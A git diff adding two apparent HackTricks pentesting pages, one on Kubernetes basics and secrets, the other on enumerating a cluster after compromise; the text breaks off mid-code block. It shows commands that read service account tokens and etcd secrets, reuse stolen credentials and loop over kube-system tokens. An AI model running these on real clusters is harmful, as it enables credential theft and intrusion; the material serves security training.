+✨  Automatically selected the virtualbox driver. Other choices: none, ssh
+💿  Downloading VM boot image ...
+    > minikube-v1.19.0.iso.sha256: 65 B / 65 B [-------------] 100.00% ? p/s 0s
+    > minikube-v1.19.0.iso: 244.49 MiB / 244.49 MiB  100.00% 1.78 MiB p/s 2m17.
+👍  Starting control plane node minikube in cluster minikube
+💾  Downloading Kubernetes v1.20.2 preload ...
+    > preloaded-images-k8s-v10-v1...: 491.71 MiB / 491.71 MiB  100.00% 2.59 MiB
+🔥  Creating virtualbox VM (CPUs=2, Memory=3900MB, Disk=20000MB) ...
+🐳  Preparing Kubernetes v1.20.2 on Docker 20.10.4 ...
+    ▪ Generating certificates and keys ...
+    ▪ Booting up control plane ...
+    ▪ Configuring RBAC rules ...
+🔎  Verifying Kubernetes components...
+    ▪ Using image gcr.io/k8s-minikube/storage-provisioner:v5
+🌟  Enabled addons: storage-provisioner, default-storageclass
+🏄  Done! kubectl is now configured to use "minikube" cluster and "default" namespace by defaul
+
+$ minikube status
+host: Running
+kubelet: Running
+apiserver: Running
+kubeconfig: Configured
+
+---- ONCE YOU HAVE A K8 SERVICE RUNNING WITH AN EXTERNAL SERVICE -----
+$ minikube service mongo-express-service
+(This will open your browser to access the service exposed port)
+
+$ minikube delete
+🔥  Deleting "minikube" in virtualbox ...
+💀  Removed all traces of the "minikube" cluster
+```
+
+### Kubectl Basics
+
+**`Kubectl`** is the command line tool for kubernetes clusters. It communicates with the Api server of the master process to perform actions in kubernetes or to ask for data.
+
+```bash
+kubectl version #Get client and server version
+kubectl get pod
+kubectl get services
+kubectl get deployment
+kubectl get replicaset
+kubectl get secret
+kubectl get all
+kubectl get ingress
+kubectl get endpoints
+
+#kubectl create deployment <deployment-name> --image=<docker image>
+kubectl create deployment nginx-deployment --image=nginx
+#Access the configuration of the deployment and modify it
+#kubectl edit deployment <deployment-name>
+kubectl edit deployment nginx-deployment
+#Get the logs of the pod for debbugging (the output of the docker container running)
+#kubectl logs <replicaset-id/pod-id>
+kubectl logs nginx-deployment-84cd76b964
+#kubectl describe pod <pod-id>
+kubectl describe pod mongo-depl-5fd6b7d4b4-kkt9q
+#kubectl exec -it <pod-id> -- bash
+kubectl exec -it mongo-depl-5fd6b7d4b4-kkt9q -- bash
+#kubectl describe service <service-name>
+kubectl describe service mongodb-service
+#kubectl delete deployment <deployment-name>
+kubectl delete deployment mongo-depl
+#Deploy from config file
+kubectl apply -f deployment.yml
+```
+
+### Minikube Dashboard
+
+The dashboard allows you to see easier what is minikube running, you can find the URL to access it in:
+
+```
+minikube dashboard --url
+
+
+🔌  Enabling dashboard ...
+    ▪ Using image kubernetesui/dashboard:v2.3.1
+    ▪ Using image kubernetesui/metrics-scraper:v1.0.7
+🤔  Verifying dashboard health ...
+🚀  Launching proxy ...
+🤔  Verifying proxy health ...
+http://127.0.0.1:50034/api/v1/namespaces/kubernetes-dashboard/services/http:kubernetes-dashboard:/proxy/
+```
+
+### YAML configuration files examples
+
+Each configuration file has 3 parts: **metadata**, **specification** (what need to be launch), **status** (desired state).\
+Inside the specification of the deployment configuration file you can find the template defined with a new configuration structure defining the image to run:
+
+**Example of Deployment + Service declared in the same configuration file (from** [**here**](https://gitlab.com/nanuchi/youtube-tutorial-series/-/blob/master/demo-kubernetes-components/mongo.yaml)**)**
+
+As a service usually is related to one deployment it's possible to declare both in the same configuration file (the service declared in this config is only accessible internally):
+
+```yaml
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: mongodb-deployment
+  labels:
+    app: mongodb
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app: mongodb
+  template:
+    metadata:
+      labels:
+        app: mongodb
+    spec:
+      containers:
+      - name: mongodb
+        image: mongo
+        ports:
+        - containerPort: 27017
+        env:
+        - name: MONGO_INITDB_ROOT_USERNAME
+          valueFrom:
+            secretKeyRef:
+              name: mongodb-secret
+              key: mongo-root-username
+        - name: MONGO_INITDB_ROOT_PASSWORD
+          valueFrom: 
+            secretKeyRef:
+              name: mongodb-secret
+              key: mongo-root-password
+---
+apiVersion: v1
+kind: Service
+metadata:
+  name: mongodb-service
+spec:
+  selector:
+    app: mongodb
+  ports:
+    - protocol: TCP
+      port: 27017
+      targetPort: 27017
+```
+
+**Example of external service config**
+
+This service will be accessible externally (check the `nodePort` and `type: LoadBlancer` attributes):
+
+```yaml
+---
+apiVersion: v1
+kind: Service
+metadata:
+  name: mongo-express-service
+spec:
+  selector:
+    app: mongo-express
+  type: LoadBalancer
+  ports:
+    - protocol: TCP
+      port: 8081
+      targetPort: 8081
+      nodePort: 30000
+```
+
+{% hint style="info" %}
+This is useful for testing but for production you should have only internal services and an Ingress to expose the application.
+{% endhint %}
+
+**Example of Ingress config file**
+
+This will expose the application in `http://dashboard.com`.
+
+```yaml
+apiVersion: networking.k8s.io/v1
+kind: Ingress
+metadata:
+  name: dashboard-ingress
+  namespace: kubernetes-dashboard
+spec:
+  rules:
+  - host: dashboard.com
+    http:
+      paths:
+      - backend:
+          serviceName: kubernetes-dashboard
+          servicePort: 80
+```
+
+**Example of secrets config file**
+
+Note how the password are encoded in B64 (which isn't secure!)
+
+```yaml
+apiVersion: v1
+kind: Secret
+metadata:
+    name: mongodb-secret
+type: Opaque
+data:
+    mongo-root-username: dXNlcm5hbWU=
+    mongo-root-password: cGFzc3dvcmQ=
+```
+
+**Example of ConfigMap**
+
+A **ConfigMap** is the configuration that is given to the pods so they know how to locate and access other services. In this case, each pod will know that the name `mongodb-service` is the address of a pod that they can communicate with (this pod will be executing a mongodb):
+
+```yaml
+apiVersion: v1
+kind: ConfigMap
+metadata:
+  name: mongodb-configmap
+data:
+  database_url: mongodb-service
+```
+
+Then, inside a **deployment config** this address can be specified in the following way so it's loaded inside the env of the pod:
+
+```yaml
+[...]
+spec:
+  [...]
+  template:
+    [...]
+    spec:
+      containers:
+      - name: mongo-express
+        image: mongo-express
+        ports:
+        - containerPort: 8081
+        env:
+        - name: ME_CONFIG_MONGODB_SERVER
+          valueFrom: 
+            configMapKeyRef:
+              name: mongodb-configmap
+              key: database_url
+[...]
+```
+
+**Example of volume config**
+
+You can find different example of storage configuration yaml files in [https://gitlab.com/nanuchi/youtube-tutorial-series/-/tree/master/kubernetes-volumes](https://gitlab.com/nanuchi/youtube-tutorial-series/-/tree/master/kubernetes-volumes).\
+**Note that volumes aren't inside namespaces**
+
+### Namespaces
+
+Kubernetes supports **multiple virtual clusters** backed by the same physical cluster. These virtual clusters are called **namespaces**. These are intended for use in environments with many users spread across multiple teams, or projects. For clusters with a few to tens of users, you should not need to create or think about namespaces at all. You only should start using namespaces to have a better control and organization of each part of the application deployed in kubernetes.
+
+Namespaces provide a scope for names. Names of resources need to be unique within a namespace, but not across namespaces. Namespaces cannot be nested inside one another and **each** Kubernetes **resource** can only be **in** **one** **namespace**.
+
+There are 4 namespaces by default if you are using minikube:
+
+```
+kubectl get namespace
+NAME              STATUS   AGE
+default           Active   1d
+kube-node-lease   Active   1d
+kube-public       Active   1d
+kube-system       Active   1d
+```
+
+* **kube-system**: It's not meant or the users use and you shouldn't touch it. It's for master and kubectl processes.
+* **kube-public**: Publicly accessible date. Contains a configmap which contains cluster information
+* **kube-node-lease**: Determines the availability of a node
+* **default**: The namespace the user will use to create resources
+
+```bash
+#Create namespace
+kubectl create namespace my-namespace
+```
+
+{% hint style="info" %}
+Note that most Kubernetes resources (e.g. pods, services, replication controllers, and others) are in some namespaces. However, other resources like namespace resources and low-level resources, such as nodes and persistenVolumes are not in a namespace. To see which Kubernetes resources are and aren’t in a namespace:
+
+```bash
+kubectl api-resources --namespaced=true #In a namespace
+kubectl api-resources --namespaced=false #Not in a namespace
+```
+{% endhint %}
+
+You can save the namespace for all subsequent kubectl commands in that context.
+
+```bash
+kubectl config set-context --current --namespace=<insert-namespace-name-here>
+```
+
+### Helm
+
+Helm is the **package manager** for Kubernetes. It allows to package YAML files and distribute them in public and private repositories. These packages are called **Helm Charts**.
+
+```
+helm search <keyword>
+```
+
+Helm is also a template engine that allows to generate config files with variables:
+
+## Kubernetes secrets
+
+A **Secret** is an object that **contains sensitive data** such as a password, a token or a key. Such information might otherwise be put in a Pod specification or in an image. Users can create Secrets and the system also creates Secrets. The name of a Secret object must be a valid **DNS subdomain name**. Read here [the official documentation](https://kubernetes.io/docs/concepts/configuration/secret/).
+
+Secrets might be things like:
+
+* API, SSH Keys.
+* OAuth tokens.
+* Credentials, Passwords (plain text or b64 + encryption).
+* Information or comments.
+* Database connection code, strings… .
+
+There are different types of secrets in Kubernetes
+
+| Builtin Type                        | Usage                                     |
+| ----------------------------------- | ----------------------------------------- |
+| **Opaque**                          | **arbitrary user-defined data (Default)** |
+| kubernetes.io/service-account-token | service account token                     |
+| kubernetes.io/dockercfg             | serialized \~/.dockercfg file             |
+| kubernetes.io/dockerconfigjson      | serialized \~/.docker/config.json file    |
+| kubernetes.io/basic-auth            | credentials for basic authentication      |
+| kubernetes.io/ssh-auth              | credentials for SSH authentication        |
+| kubernetes.io/tls                   | data for a TLS client or server           |
+| bootstrap.kubernetes.io/token       | bootstrap token data                      |
+
+{% hint style="info" %}
+**The Opaque type is the default one, the typical key-value pair defined by users.**
+{% endhint %}
+
+**How secrets works:**
+
+![](https://sickrov.github.io/media/Screenshot-164.jpg)
+
+The following configuration file defines a **secret** called `mysecret` with 2 key-value pairs `username: YWRtaW4=` and `password: MWYyZDFlMmU2N2Rm`. It also defines a **pod** called `secretpod` that will have the `username` and `password` defined in `mysecret` exposed in the **environment variables** `SECRET_USERNAME` \_\_ and \_\_ `SECRET_PASSWOR`. It will also **mount** the `username` secret inside `mysecret` in the path `/etc/foo/my-group/my-username` with `0640` permissions.
+
+{% code title="secretpod.yaml" %}
+```yaml
+apiVersion: v1
+kind: Secret
+metadata:
+  name: mysecret
+type: Opaque
+data:
+  username: YWRtaW4=
+  password: MWYyZDFlMmU2N2Rm
+---
+apiVersion: v1
+kind: Pod
+metadata:
+  name: secretpod
+spec:
+  containers:
+  - name: secretpod
+    image: nginx
+    env:
+      - name: SECRET_USERNAME
+        valueFrom:
+          secretKeyRef:
+            name: mysecret
+            key: username
+      - name: SECRET_PASSWORD
+        valueFrom:
+          secretKeyRef:
+            name: mysecret
+            key: password
+    volumeMounts:
+    - name: foo
+      mountPath: "/etc/foo"
+  restartPolicy: Never
+  volumes:
+  - name: foo
+    secret:
+      secretName: mysecret
+      items:
+      - key: username
+        path: my-group/my-username
+        mode: 0640
+```
+{% endcode %}
+
+```bash
+kubectl apply -f <secretpod.yaml>
+kubectl get pods #Wait until the pod secretpod is running
+kubectl exec -it  secretpod -- bash
+env | grep SECRET && cat /etc/foo/my-group/my-username && echo
+```
+
+### Secrets in etcd <a href="#discover-secrets-in-etcd" id="discover-secrets-in-etcd"></a>
+
+**etcd** is a consistent and highly-available **key-value store** used as Kubernetes backing store for all cluster data. Let’s access to the secrets stored in etcd:
+
+```bash
+cat /etc/kubernetes/manifests/kube-apiserver.yaml | grep etcd
+```
+
+You will see certs, keys and url’s were are located in the FS. Once you get it, you would be able to connect to etcd.
+
+```bash
+#ETCDCTL_API=3 etcdctl --cert <path to client.crt> --key <path to client.ket> --cacert <path to CA.cert> endpoint=[<ip:port>] health
+
+ETCDCTL_API=3 etcdctl --cert /etc/kubernetes/pki/apiserver-etcd-client.crt --key /etc/kubernetes/pki/apiserver-etcd-client.key --cacert /etc/kubernetes/pki/etcd/etcd/ca.cert endpoint=[127.0.0.1:1234] health
+```
+
+Once you achieve establish communication you would be able to get the secrets:
+
+```bash
+#ETCDCTL_API=3 etcdctl --cert <path to client.crt> --key <path to client.ket> --cacert <path to CA.cert> endpoint=[<ip:port>] get <path/to/secret>
+
+ETCDCTL_API=3 etcdctl --cert /etc/kubernetes/pki/apiserver-etcd-client.crt --key /etc/kubernetes/pki/apiserver-etcd-client.key --cacert /etc/kubernetes/pki/etcd/etcd/ca.cert endpoint=[127.0.0.1:1234] get /registry/secrets/default/secret_02
+```
+
+**Adding encryption to the ETCD**
+
+By default all the secrets are **stored in plain** text inside etcd unless you apply an encryption layer. The following example is based on [https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/](https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/)
+
+{% code title="encryption.yaml" %}
+```yaml
+apiVersion: apiserver.config.k8s.io/v1
+kind: EncryptionConfiguration
+resources:
+  - resources:
+    - secrets
+    providers:
+    - aescbc:
+        keys:
+        - name: key1
+          secret: cjjPMcWpTPKhAdieVtd+KhG4NN+N6e3NmBPMXJvbfrY= #Any random key
+    - identity: {}
+```
+{% endcode %}
+
+After that, you need to set the `--encryption-provider-config` flag on the `kube-apiserver` to point to the location of the created config file. You can modify `/etc/kubernetes/manifest/kube-apiserver.yaml` and add the following lines:
+
+```yaml
+  containers:
+  - command:
+    - kube-apiserver
+    - --encriyption-provider-config=/etc/kubernetes/etcd/<configFile.yaml>
+```
+
+Scroll down in the volumeMounts:
+
+```yaml
+- mountPath: /etc/kubernetes/etcd
+    name: etcd
+    readOnly: true
+```
+
+Scroll down in the volumeMounts to hostPath:
+
+```yaml
+- hostPath:
+    path: /etc/kubernetes/etcd
+    type: DirectoryOrCreate
+  name: etcd
+```
+
+**Verifying that data is encrypted**
+
+Data is encrypted when written to etcd. After restarting your `kube-apiserver`, any newly created or updated secret should be encrypted when stored. To check, you can use the `etcdctl` command line program to retrieve the contents of your secret.
+
+1.  Create a new secret called `secret1` in the `default` namespace:
+
+    ```
+    kubectl create secret generic secret1 -n default --from-literal=mykey=mydata
+    ```
+2.  Using the etcdctl commandline, read that secret out of etcd:
+
+    `ETCDCTL_API=3 etcdctl get /registry/secrets/default/secret1 [...] | hexdump -C`
+
+    where `[...]` must be the additional arguments for connecting to the etcd server.
+3. Verify the stored secret is prefixed with `k8s:enc:aescbc:v1:` which indicates the `aescbc` provider has encrypted the resulting data.
+4.  Verify the secret is correctly decrypted when retrieved via the API:
+
+    ```
+    kubectl describe secret secret1 -n default
+    ```
+
+    should match `mykey: bXlkYXRh`, mydata is encoded, check [decoding a secret](https://kubernetes.io/docs/concepts/configuration/secret#decoding-a-secret) to completely decode the secret.
+
+**Since secrets are encrypted on write, performing an update on a secret will encrypt that content:**
+
+```
+kubectl get secrets --all-namespaces -o json | kubectl replace -f -
+```
+
+**Final tips:**
+
+* Try not to keep secrets in the FS, get them from other places.
+* Check out [https://www.vaultproject.io/](https://www.vaultproject.io) for add more protection to your secrets.
+* [https://kubernetes.io/docs/concepts/configuration/secret/#risks](https://kubernetes.io/docs/concepts/configuration/secret/#risks)
+* [https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes\_deployApplicationsConjur-k8s-Secrets.htm](https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes_deployApplicationsConjur-k8s-Secrets.htm)
+
+## References
+
+{% embed url="https://sickrov.github.io/" %}
+
+{% embed url="https://www.youtube.com/watch?v=X48VuDVv0do" %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md b/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
new file mode 100644
index 0000000000..358bdee06d
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
@@ -0,0 +1,580 @@
+# Kubernetes Enumeration
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Kubernetes Tokens
+
+If you have compromised access to a machine the user may have access to some Kubernetes platform. The token is usually located in a file pointed by the **env var `KUBECONFIG`** or **inside `~/.kube`**.
+
+In this folder you might find config files with **tokens and configurations to connect to the API server**. In this folder you can also find a cache folder with information previously retrieved.
+
+If you have compromised a pod inside a kubernetes environment, there are other places where you can find tokens and information about the current K8 env:
+
+### Service Account Tokens
+
+Before continuing, if you don't know what is a service in Kubernetes I would suggest you to **follow this link and read at least the information about Kubernetes architecture.**
+
+Taken from the Kubernetes [documentation](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#use-the-default-service-account-to-access-the-api-server):
+
+_“When you create a pod, if you do not specify a service account, it is automatically assigned the_ default _service account in the same namespace.”_
+
+**ServiceAccount** is an object managed by Kubernetes and used to provide an identity for processes that run in a pod.\
+Every service account has a secret related to it and this secret contains a bearer token. This is a JSON Web Token (JWT), a method for representing claims securely between two parties.
+
+Usually **one** of the directories:
+
+* `/run/secrets/kubernetes.io/serviceaccount`
+* `/var/run/secrets/kubernetes.io/serviceaccount`
+* `/secrets/kubernetes.io/serviceaccount`
+
+contain the files:
+
+* **ca.crt**: It's the ca certificate to check kubernetes communications
+* **namespace**: It indicates the current namespace
+* **token**: It contains the **service token** of the current pod.
+
+Now that you have the token, you can find the API server inside the environment variable **`KUBECONFIG`**. For more info run `(env | set) | grep -i "kuber|kube`**`"`**
+
+The service account token is being signed by the key residing in the file **sa.key** and validated by **sa.pub**.
+
+Default location on **Kubernetes**:
+
+* /etc/kubernetes/pki
+
+Default location on **Minikube**:
+
+* /var/lib/localkube/certs
+
+### Hot Pods
+
+_**Hot pods are**_ pods containing a privileged service account token. A privileged service account token is a token that has permission to do privileged tasks such as listing secrets, creating pods, etc.
+
+## RBAC
+
+If you don't know what is **RBAC**, **read this section**.
+
+## GUI Applications
+
+* **k9s**: A GUI that enumerates a kubernetes cluster from the terminal. Check the commands in[https://k9scli.io/topics/commands/](https://k9scli.io/topics/commands/). Write `:namespace` and select all to then search resources in all the namespaces.
+* **k8slens**: It offers some free trial days: [https://k8slens.dev/](https://k8slens.dev/)
+
+## Enumeration CheatSheet
+
+In order to enumerate a K8s environment you need a couple of this:
+
+* A **valid authentication token**. In the previous section we saw where to search for a user token and for a service account token.
+* The **address (**_**https://host:port**_**) of the Kubernetes API**. This can be usually found in the environment variables and/or in the kube config file.
+* **Optional**: The **ca.crt to verify the API server**. This can be found in the same places the token can be found. This is useful to verify the API server certificate, but using `--insecure-skip-tls-verify` with `kubectl` or `-k` with `curl` you won't need this.
+
+With those details you can **enumerate kubernetes**. If the **API** for some reason is **accessible** through the **Internet**, you can just download that info and enumerate the platform from your host.
+
+However, usually the **API server is inside an internal network**, therefore you will need to **create a tunnel** through the compromised machine to access it from your machine, or you can **upload the** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, or use **`curl/wget/anything`** to perform raw HTTP requests to the API server.
+
+### Differences between `list` and `get` verbs
+
+With **`get`** permissions you can access information of specific assets (_`describe` option in `kubectl`_) API:
+
+```
+GET /apis/apps/v1/namespaces/{namespace}/deployments/{name}
+```
+
+If you have the **`list`** permission, you are allowed to execute API requests to list a type of asset (_`get` option in `kubectl`_):
+
+```bash
+#In a namespace
+GET /apis/apps/v1/namespaces/{namespace}/deployments
+#In all namespaces
+GET /apis/apps/v1/deployments
+```
+
+If you have the **`watch`** permission, you are allowed to execute API requests to monitor assets:
+
+```
+GET /apis/apps/v1/deployments?watch=true
+GET /apis/apps/v1/watch/namespaces/{namespace}/deployments?watch=true
+GET /apis/apps/v1/watch/namespaces/{namespace}/deployments/{name}  [DEPRECATED]
+GET /apis/apps/v1/watch/namespaces/{namespace}/deployments  [DEPRECATED]
+GET /apis/apps/v1/watch/deployments  [DEPRECATED]
+```
+
+They open a streaming connection that returns you the full manifest of a Deployment whenever it changes (or when a new one is created).
+
+{% hint style="danger" %}
+The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get`
+{% endhint %}
+
+### Using curl
+
+From inside a pod you can use several env variables:
+
+```bash
+export APISERVER=${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}
+export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
+export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
+export TOKEN=$(cat ${SERVICEACCOUNT}/token)
+export CACERT=${SERVICEACCOUNT}/ca.crt
+alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
+# if kurl is still got cert Error, using -k option to solve this.
+```
+
+{% hint style="warning" %}
+By default the pod can **access** the **kube-api server** in the domain name **`kubernetes.default.svc`** and you can see the kube network in **`/etc/resolv.config`** as here you will find the address of the kubernetes DNS server (the ".1" of the same range is the kube-api endpoint).
+{% endhint %}
+
+### Using kubectl
+
+Having the token and the address of the API server you use kubectl or curl to access it as indicated here:
+
+By default, The APISERVER is communicating with `https://` schema
+
+{% code overflow="wrap" %}
+```bash
+alias k='kubectl --token=$TOKEN --server=https://$APISERVER --insecure-skip-tls-verify=true [--all-namespaces]' # Use --all-namespaces to always search in all namespaces
+```
+{% endcode %}
+
+> if no `https://` in url, you may get Error Like Bad Request.
+
+You can find an [**official kubectl cheatsheet here**](https://kubernetes.io/docs/reference/kubectl/cheatsheet/). The goal of the following sections is to present in ordered manner different options to enumerate and understand the new K8s you have obtained access to.
+
+To find the HTTP request that `kubectl` sends you can use the parameter `-v=8`
+
+#### MitM kubectl - Proxyfying kubectl
+
+```bash
+# Launch burp
+# Set proxy
+export HTTP_PROXY=http://localhost:8080
+export HTTPS_PROXY=http://localhost:8080
+# Launch kubectl
+kubectl get namespace --insecure-skip-tls-verify=true
+```
+
+### Current Configuration
+
+{% tabs %}
+{% tab title="Kubectl" %}
+```bash
+kubectl config get-users
+kubectl config get-contexts
+kubectl config get-clusters
+kubectl config current-context
+
+# Change namespace
+kubectl config set-context --current --namespace=<namespace>
+```
+{% endtab %}
+{% endtabs %}
+
+If you managed to steal some users credentials you can **configure them locally** using something like:
+
+```bash
+kubectl config set-credentials USER_NAME \
+   --auth-provider=oidc \
+   --auth-provider-arg=idp-issuer-url=( issuer url ) \
+   --auth-provider-arg=client-id=( your client id ) \
+   --auth-provider-arg=client-secret=( your client secret ) \
+   --auth-provider-arg=refresh-token=( your refresh token ) \
+   --auth-provider-arg=idp-certificate-authority=( path to your ca certificate ) \
+   --auth-provider-arg=id-token=( your id_token )
+```
+
+### Get Supported Resources
+
+With this info you will know all the services you can list
+
+{% tabs %}
+{% tab title="kubectl" %}
+```bash
+k api-resources --namespaced=true #Resources specific to a namespace
+k api-resources --namespaced=false #Resources NOT specific to a namespace
+```
+{% endtab %}
+{% endtabs %}
+
+### Get Current Privileges
+
+{% tabs %}
+{% tab title="kubectl" %}
+```bash
+k auth can-i --list #Get privileges in general
+k auth can-i --list -n custnamespace #Get privileves in custnamespace
+
+# Get service account permissions
+k auth can-i --list --as=system:serviceaccount:<namespace>:<sa_name> -n <namespace>
+```
+{% endtab %}
+
+{% tab title="API" %}
+```bash
+kurl -i -s -k -X $'POST' \
+    -H $'Content-Type: application/json' \
+    --data-binary $'{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authorization.k8s.io/v1\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"namespace\":\"default\"},\"status\":{\"resourceRules\":null,\"nonResourceRules\":null,\"incomplete\":false}}\x0a' \
+    "https://$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews"
+```
+{% endtab %}
+{% endtabs %}
+
+Another way to check your privileges is using the tool: [**https://github.com/corneliusweig/rakkess**](https://github.com/corneliusweig/rakkess)\*\*\*\*
+
+You can learn more about **Kubernetes RBAC** in:
+
+{% content-ref url="kubernetes-role-based-access-control-rbac.md" %}
+[kubernetes-role-based-access-control-rbac.md](kubernetes-role-based-access-control-rbac.md)
+{% endcontent-ref %}
+
+**Once you know which privileges** you have, check the following page to figure out **if you can abuse them** to escalate privileges:
+
+{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %}
+[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
+{% endcontent-ref %}
+
+### Get Others roles
+
+{% tabs %}
+{% tab title="kubectl" %}
+```bash
+k get roles
+k get clusterroles
+```
+{% endtab %}
+
+{% tab title="API" %}
+```bash
+kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/roles?limit=500"
+kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/clusterroles?limit=500"
+```
+{% endtab %}
+{% endtabs %}
+
+### Get namespaces
+
+Kubernetes supports **multiple virtual clusters** backed by the same physical cluster. These virtual clusters are called **namespaces**.
+
+{% tabs %}
+{% tab title="kubectl" %}
+```bash
+k get namespaces
+```
+{% endtab %}
+
+{% tab title="API" %}
+```bash
+kurl -k -v https://$APISERVER/api/v1/namespaces/
+```
+{% endtab %}
+{% endtabs %}
+
+### Get secrets
+
+{% tabs %}
+{% tab title="kubectl" %}
+```bash
+k get secrets -o yaml
+k get secrets -o yaml -n custnamespace
+```
+{% endtab %}
+
+{% tab title="API" %}
+```bash
+kurl -v https://$APISERVER/api/v1/namespaces/default/secrets/
+
+kurl -v https://$APISERVER/api/v1/namespaces/custnamespace/secrets/
+```
+{% endtab %}
+{% endtabs %}
+
+If you can read secrets you can use the following lines to get the privileges related to each to token:
+
+```bash
+for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done
+```
+
+### Get Service Accounts
+
+As discussed at the begging of this page **when a pod is run a service account is usually assigned to it**. Therefore, listing the service accounts, their permissions and where are they running may allow a user to escalate privileges.
+
+{% tabs %}
+{% tab title="kubectl" %}
+```bash
+k get serviceaccounts
+```
+{% endtab %}
+
+{% tab title="API" %}
+```bash
+kurl -k -v https://$APISERVER/api/v1/namespaces/{namespace}/serviceaccounts
+```
+{% endtab %}
+{% endtabs %}
+
+### Get Deployments
+
+The deployments specify the **components** that need to be **run**.
+
+{% tabs %}
+{% tab title="kubectl" %}
+```bash
+k get deployments
+k get deployments -n custnamespace
+```
+{% endtab %}
+
+{% tab title="API" %}
+```bash
+kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/deployments/
+```
+{% endtab %}
+{% endtabs %}
+
+### Get Pods
+
+The Pods are the actual **containers** that will **run**.
+
+{% tabs %}
+{% tab title="kubectl" %}
+```bash
+k get pods
+k get pods -n custnamespace
+```
+{% endtab %}
+
+{% tab title="API" %}
+```bash
+kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/pods/
+```
+{% endtab %}
+{% endtabs %}
+
+### Get Services
+
+Kubernetes **services** are used to **expose a service in a specific port and IP** (which will act as load balancer to the pods that are actually offering the service). This is interesting to know where you can find other services to try to attack.
+
+{% tabs %}
+{% tab title="kubectl" %}
+```bash
+k get services
+k get services -n custnamespace
+```
+{% endtab %}
+
+{% tab title="API" %}
+```bash
+kurl -v https://$APISERVER/api/v1/namespaces/default/services/
+```
+{% endtab %}
+{% endtabs %}
+
+### Get nodes
+
+Get all the **nodes configured inside the cluster**.
+
+{% tabs %}
+{% tab title="kubectl" %}
+```bash
+k get nodes
+```
+{% endtab %}
+
+{% tab title="API" %}
+```bash
+kurl -v https://$APISERVER/api/v1/nodes/
+```
+{% endtab %}
+{% endtabs %}
+
+### Get DaemonSets
+
+**DaeamonSets** allows to ensure that a **specific pod is running in all the nodes** of the cluster (or in the ones selected). If you delete the DaemonSet the pods managed by it will be also removed.
+
+{% tabs %}
+{% tab title="kubectl" %}
+```bash
+k get daemonsets
+```
+{% endtab %}
+
+{% tab title="API" %}
+```bash
+kurl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets
+```
+{% endtab %}
+{% endtabs %}
+
+### Get cronjob
+
+Cron jobs allows to schedule using crontab like syntax the launch of a pod that will perform some action.
+
+{% tabs %}
+{% tab title="kubectl" %}
+```bash
+k get cronjobs
+```
+{% endtab %}
+
+{% tab title="API" %}
+```bash
